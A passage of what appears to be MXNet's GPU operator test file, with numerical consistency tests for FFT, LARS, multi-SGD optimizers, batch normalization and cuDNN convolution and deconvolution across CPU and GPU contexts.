a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0], rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0]/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
def _make_ndarrays(input_list, ctx=mx.gpu(0)):
return [mx.nd.array(arr, dtype=arr.dtype, ctx=ctx) for arr in input_list]
def check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2):
values_arr = [np.random.rand(*shape).astype(dtype) * 10. for shape in shapes]
mx_vals = _make_ndarrays(values_arr, ctx=ctx)
sum_sq = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
sum_sq2 = mx.nd.multi_sum_sq(*mx_vals, num_arrays=len(shapes))
# checks that operator is deterministic
assert np.array_equal(sum_sq.asnumpy(), sum_sq2.asnumpy())
ref_sum_sq = mx.nd.array([(v.astype('float32') ** 2).sum() for v in values_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_sum_sq.asnumpy(), sum_sq.asnumpy(), atol=tol1, rtol=tol1)
@with_seed()
@pytest.mark.serial
def test_multi_sum_sq():
min_nparam = 100
max_nparam = 120
min_dim = 50000
max_dim = 100000
max_ndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.gpu(0)]:
for dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(min_dim, max_dim + 1, size=max_ndim) for i in range(nparam)]
low_tol = ctx == mx.cpu(0) and ('float16' in [dtype])
tol1 = 1e-3 if low_tol else 1e-5
tol2 = 1e-6 if low_tol else 1e-7
check_multi_sum_sq(dtype, shapes, ctx, tol1, tol2)
def check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2):
weights_arr = [np.random.rand(*shape).astype(w_dtype) * 10. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(g_dtype) for shape in shapes]
lrs = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 100.
wds = (np.random.rand(len(shapes)).astype('float32') + 0.1) / 1000.
eta = (np.random.rand() + 0.1)
eps = (np.random.rand() + 0.1) / 10000.
mx_w = _make_ndarrays(weights_arr, ctx=ctx)
mx_g = _make_ndarrays(grads_arr, ctx=ctx)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=ctx)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=ctx)
w_sum_sq = mx.nd.multi_sum_sq(*mx_w, num_arrays=len(shapes))
g_sum_sq = mx.nd.multi_sum_sq(*mx_g, num_arrays=len(shapes))
ref_w_sum_sq = mx.nd.array([(w.astype('float32') ** 2).sum() for w in weights_arr],
dtype='float32', ctx=ctx)
ref_g_sum_sq = mx.nd.array([(g.astype('float32') ** 2).sum() for g in grads_arr],
dtype='float32', ctx=ctx)
assert_almost_equal(ref_w_sum_sq.asnumpy(), w_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
assert_almost_equal(ref_g_sum_sq.asnumpy(), g_sum_sq.asnumpy(), atol=tol1, rtol=tol1)
rescale_grad = (np.random.rand() + 0.5) * 100.
mx_new_lrs = mx.nd.multi_lars(mx_lrs, w_sum_sq, g_sum_sq, mx_wds, eta=eta, eps=eps,
rescale_grad=rescale_grad)
ref_w_l2norm = mx.nd.sqrt(ref_w_sum_sq)
ref_g_l2norm = mx.nd.sqrt(ref_g_sum_sq * rescale_grad * rescale_grad)
ref_new_lrs = mx.nd.zeros(ref_w_l2norm.shape, dtype='float32', ctx=ctx)
for i in range(ref_w_l2norm.size):
_w = ref_w_l2norm[i]
_g = ref_g_l2norm[i]
if _w > 0.0 and _g > 0.0:
ref_new_lrs[i] = lrs[i] * eta * _w / (_g + wds[i] * _w + eps)
else:
ref_new_lrs[i] = lrs[i]
assert_almost_equal(ref_new_lrs.asnumpy(), mx_new_lrs.asnumpy(), atol=tol2, rtol=tol2)
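# Summary of the reference loop above (not extra test logic): the layer-wise LARS rate is
#   new_lr_i = lr_i * eta * ||w_i||_2 / (||g_i||_2 * rescale_grad + wd_i * ||w_i||_2 + eps)
# and falls back to lr_i whenever either norm is zero.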
@with_seed()
@pytest.mark.serial
def test_fast_lars():
min_nparam = 50
max_nparam = 60
maxdim = 10000
maxndim = 1
dtypes = ['float16','float32', 'float64']
for ctx in [mx.cpu(0), mx.gpu(0)]:
for w_dtype in dtypes:
for g_dtype in dtypes:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
lowTol = ctx == mx.cpu(0) and ('float16' in [w_dtype, g_dtype])
tol1 = 1e-3 if lowTol else 1e-5
tol2 = 1e-6 if lowTol else 1e-7
check_fast_lars(w_dtype, g_dtype, shapes, ctx, tol1, tol2)
def check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights):
def _flatten_list(nested_list):
return [item for sublist in nested_list for item in sublist]
weights_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
grads_arr = [np.random.rand(*shape).astype(dtype) * 100. for shape in shapes]
rescale_grad = (np.random.random() + 1.0)
mx_w = _make_ndarrays(weights_arr)
mx_g = _make_ndarrays(grads_arr)
mx_p_w = _make_ndarrays(weights_arr)
mx_p_g = _make_ndarrays(grads_arr)
lrs = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 100.)
mx_lrs = mx.nd.array(lrs, dtype='float32', ctx=mx.gpu(0))
wds = list((np.random.random(size=len(shapes)).astype('float32') + 0.1) / 1000.)
mx_wds = mx.nd.array(wds, dtype='float32', ctx=mx.gpu(0))
if use_master_weights:
weights32_arr = [arr.astype('float32') for arr in weights_arr]
mx_w32 = _make_ndarrays(weights32_arr)
mx_p_w32 = _make_ndarrays(weights32_arr)
if momentum is None:
if use_master_weights:
mx.nd.multi_mp_sgd_update(
*_flatten_list(zip(mx_w, mx_g, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
mx.nd.preloaded_multi_mp_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
out = mx.nd.multi_sgd_update(
*_flatten_list(zip(mx_w, mx_g)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=rescale_grad, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_sgd_update(
*(_flatten_list(zip(mx_p_w, mx_p_g)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=rescale_grad, out=mx_p_w)
else:
if use_master_weights:
momentums_arr = [np.random.rand(*shape).astype("float32") for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
out = mx.nd.multi_mp_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m, mx_w32)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
preloaded_out = mx.nd.preloaded_multi_mp_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m, mx_p_w32)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
else:
momentums_arr = [np.random.rand(*shape).astype(dtype) for shape in shapes]
mx_m = _make_ndarrays(momentums_arr)
mx_p_m = _make_ndarrays(momentums_arr)
mx.nd.multi_sgd_mom_update(
*_flatten_list(zip(mx_w, mx_g, mx_m)),
num_weights=len(shapes), lrs=lrs, wds=wds,
rescale_grad=0.95, momentum=momentum, out=mx_w)
mx.nd.preloaded_multi_sgd_mom_update(
*(_flatten_list(zip(mx_p_w, mx_p_g, mx_p_m)) +
[mx_lrs, mx_wds]), num_weights=len(shapes),
rescale_grad=0.95, momentum=momentum, out=mx_p_w)
def _assert_all_almost_equal(lhs_list, rhs_list, rtol, atol):
for i, (lhs, rhs) in enumerate(zip(lhs_list, rhs_list)):
assert_almost_equal(lhs.asnumpy(), rhs.asnumpy(), rtol=rtol, atol=atol)
if dtype == 'float16':
rtol = 1e-3
atol = 1e-2
else:
rtol = 1e-5
atol = 1e-6
_assert_all_almost_equal(mx_p_w, mx_w, rtol, atol)
if momentum is not None:
_assert_all_almost_equal(mx_p_m, mx_m, rtol, atol)
if use_master_weights:
_assert_all_almost_equal(mx_p_w32, mx_w32, 1e-5, 1e-6)
@with_seed()
def test_preloaded_multi_sgd():
dtypes = ['float16', 'float32']
momentums = [None, 0.9]
min_nparam = 5
max_nparam = 10
maxdim = 6
maxndim = 4
for dtype in dtypes:
use_master_weights_list = [False,] if dtype == 'float32' else [True, False]
for use_master_weights in use_master_weights_list:
for momentum in momentums:
nparam = np.random.randint(min_nparam + 1, max_nparam + 1)
shapes = [np.random.randint(1, maxdim + 1, size=maxndim) for i in range(nparam)]
check_preloaded_multi_sgd(dtype, shapes, momentum, use_master_weights)
@with_seed()
@pytest.mark.serial
def test_batchnorm_with_type():
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V2, 2D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_2D)
# V2, 1D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_1D)
# V2, 3D
sym = mx.sym.BatchNorm(name='norm', fix_gamma=False, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
sym = mx.sym.BatchNorm(name='norm', fix_gamma=True, cudnn_off=True)
check_consistency(sym, ctx_list_v2_3D)
@with_seed()
@pytest.mark.serial
def test_batchnorm_versions():
def test_batchnorm_versions_helper(batchnorm_op_list, data, fix_gamma, use_global_stats):
ctx_list = []
sym_list = []
# BatchNorm cpu
if 'batchnorm_cpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm'))
# BatchNorm gpu (organic)
if 'batchnorm_gpu' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=True))
# BatchNorm gpu cudnn (if cudnn is enabled)
if 'batchnorm_cudnn' in batchnorm_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'batchnorm_data': data, 'type_dict': {'batchnorm_data': np.float32}})
sym_list.append(mx.sym.BatchNorm(fix_gamma=fix_gamma,
use_global_stats=use_global_stats,
name='batchnorm', cudnn_off=False))
check_consistency(sym_list, ctx_list)
def test_1d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 20)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_2d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 10, 10)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu', 'batchnorm_cudnn'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
def test_3d_batchnorm(fix_gamma, use_global_stats):
data = (2, 3, 3, 5, 5)
test_batchnorm_versions_helper(batchnorm_op_list=['batchnorm_cpu',
'batchnorm_gpu'],
data=data,
fix_gamma=fix_gamma, use_global_stats=use_global_stats)
test_1d_batchnorm(True, False)
test_1d_batchnorm(False, False)
test_1d_batchnorm(False, True)
test_1d_batchnorm(True, True)
test_2d_batchnorm(True, False)
test_2d_batchnorm(False, False)
test_2d_batchnorm(False, True)
test_2d_batchnorm(True, True)
test_3d_batchnorm(True, False)
test_3d_batchnorm(False, False)
test_3d_batchnorm(False, True)
test_3d_batchnorm(True, True)
@with_seed(1234)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@pytest.mark.serial
def test_convolution_with_type():
sym1 = mx.sym.Convolution(num_filter=3, kernel=(3,3), name='conv')
data = mx.sym.Variable('conv_data')
w = mx.sym.Variable('conv_weight')
b = mx.sym.Variable('conv_bias')
w = mx.sym.transpose(w, axes=(0,2,3,1))
sym2 = mx.sym.transpose(data, axes=(0,2,3,1))
sym2 = mx.sym.Convolution(sym2, w, b, layout='NHWC', num_filter=3, kernel=(3,3))
sym2 = mx.sym.transpose(sym2, axes=(0,3,1,2), name='conv')
sym = [sym1, sym1, sym1, sym1, sym1, sym2, sym2]
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 10, 10), 'type_dict': {'conv_data': np.float32}},
# NHWC
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float32, 'conv_weight': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 10, 10), 'conv_weight': (3, 2, 3, 3),
'type_dict': {'conv_data': np.float16, 'conv_weight': np.float16}}
]
# wider tolerance needed for true-fp16 NCHW test above
tol = {np.dtype(np.float16): 0.5,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
# test ability to turn off training on bias
check_consistency(sym, ctx_list, grad_req={'conv_data': 'write', 'conv_weight': 'write', 'conv_bias': 'null'}, tol=tol)
# Apply N symbols against each of M contexts, checking that all NxM combinations match.
def check_consistency_NxM(sym_list, ctx_list):
# e.g. if sym_list=[sym1, sym2] and ctx_list=[ctx1, ctx2, ctx3], then resulting lists are:
# sym_list=[sym1, sym1, sym1, sym2, sym2, sym2] and ctx_list=[ctx1, ctx2, ctx3, ctx1, ctx2, ctx3]
check_consistency(np.repeat(sym_list, len(ctx_list)), ctx_list * len(sym_list), scale=0.5)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/10141")
@with_seed()
@pytest.mark.serial
def test_convolution_options():
# 1D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(layout='NCW', num_filter=3, kernel=(1,), pad=(0,), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,), pad=(0,), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D convolution
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float16}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), pad=(1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), stride=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1), pad=(0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 3D convolution
ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
{'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 1x1 convolution
sym = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), name='conv')
sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(1,1,1), pad=(0,0,0), cudnn_off=True, name='conv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed()
@pytest.mark.serial
def test_conv_deconv_guards():
# Test cases for convolution and deconvolution via strided fft. Ensure that the framework
# guards against problematic CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING in cuDNN [7.3.1,7.5)
# see https://docs.nvidia.com/deeplearning/sdk/cudnn-release-notes/rel_750.html#rel_750
tol = 1e-1
for (op, opname) in [(mx.sym.Convolution, 'conv'), (mx.sym.Deconvolution, 'deconv')]:
dataname = opname + '_data'
ctx = {'ctx': mx.gpu(0), dataname: (32, 32, 64, 64), 'type_dict': {dataname: np.float32}}
test_cases = [
{'num_filter':32, 'kernel':(6,6), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,6), 'pad':(1,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(6,7), 'pad':(0,1), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,6), 'pad':(1,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(0,0), 'stride':(2,2), 'name': opname},
{'num_filter':32, 'kernel':(7,7), 'pad':(1,1), 'stride':(2,2), 'name': opname}]
for test_case_args in test_cases:
try:
sym = op(**test_case_args)
sym_no_cudnn = op(cudnn_off=True, **test_case_args)
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=tol)
except:
print('Test failure of mx.sym.{} with args: {}'.format(op.__name__, test_case_args))
raise
def _conv_with_num_streams(seed):
with random_seed(seed):
# Try to expose timing-dependent improper workspace sharing by parallel dgrad and wgrad
num_trials = 20
for _ in range(num_trials):
size = np.random.randint(32, 128)
# The cudnn conv operator runs dgrad and wgrad in separate streams if enabled, with possible
# kernel overlap. The non-cudnn conv op doesn't do this so is used as the 'golden copy'.
ctx = {'ctx': mx.gpu(0), 'conv_data': (2, 2, size, size),
'type_dict': {'conv_data': np.float32}}
# Adding 'flip' here isolates the model from the input node (which can't use inplace store)
flipped = mx.sym.flip(axis=0, name='conv')
sym = mx.sym.Convolution(data=flipped, num_filter=3, kernel=(3,3), pad=(1,1), name='conv')
flipped_no_cudnn = mx.sym.flip(axis=0, name='conv')
sym_no_cudnn = mx.sym.Convolution(data=flipped_no_cudnn, num_filter=3, kernel=(3,3), pad=(1,1),
cudnn_off=True, name='conv')
try:
# tol can be pretty high- we're looking for a large diff due to garbaged workspace
check_consistency([sym, sym_no_cudnn], [ctx, ctx], tol=1e-2)
except:
print('Failing conv size = {}'.format(size))
raise
@pytest.mark.skip(reason="skipping for now due to severe flakiness")
@with_seed()
def test_convolution_multiple_streams():
for num_streams in [1, 2]:
for engine in ['NaiveEngine', 'ThreadedEngine', 'ThreadedEnginePerDevice']:
print("Starting engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
run_in_spawned_process(_conv_with_num_streams,
{'MXNET_GPU_WORKER_NSTREAMS' : num_streams, 'MXNET_ENGINE_TYPE' : engine})
print("Finished engine %s with %d streams." % (engine, num_streams), file=sys.stderr)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_convolution_large_c():
problematic_c = 64 * 1024
# The convolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCW', num_filter=8, kernel=(2,), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float32}},
{'ctx': mx.gpu(0), 'conv_data': (1, problematic_c, 2, width), 'type_dict': {'conv_data': np.float64}}]
sym = mx.sym.Convolution(layout='NCHW', num_filter=4, kernel=(2,2), name='conv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
widths = [4, 16, 64]
for req in ['write', 'add']:
for width in widths:
test_1D_with_width(width, req)
test_2D_with_width(width, req)
# This test is designed to expose an issue with cudnn v7.1.4 algo find() when invoked with large c.
# Algos returned by find() can fail to run with grad_req='add' (wgrad kernel beta parameter == 1.0f).
@with_seed()
@pytest.mark.serial
def test_deconvolution_large_c():
problematic_c = 64 * 1024
# The deconvolution accumulates many values, so set large tolerances.
tol = {np.dtype(np.float32): 1,
np.dtype(np.float64): 1}
def test_1D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCW', num_filter=problematic_c, kernel=(2,), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
def test_2D_with_width(width, grad_req):
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (1, 8, 2, width), 'type_dict': {'deconv_data': np.float64}}]
sym = mx.sym.Deconvolution(layout='NCHW', num_filter=problematic_c, kernel=(2,2), name='deconv')
check_consistency([sym, sym], ctx_list, tol=tol, grad_req=grad_req)
# Run with different data tensor shapes to run cudnnFind() multiple times.
# First, populate algo and op caches with models that always use cudnnFind() (req == 'write').
# Then run models that must avoid cached cudnnFind() results in some cases (req == 'add').
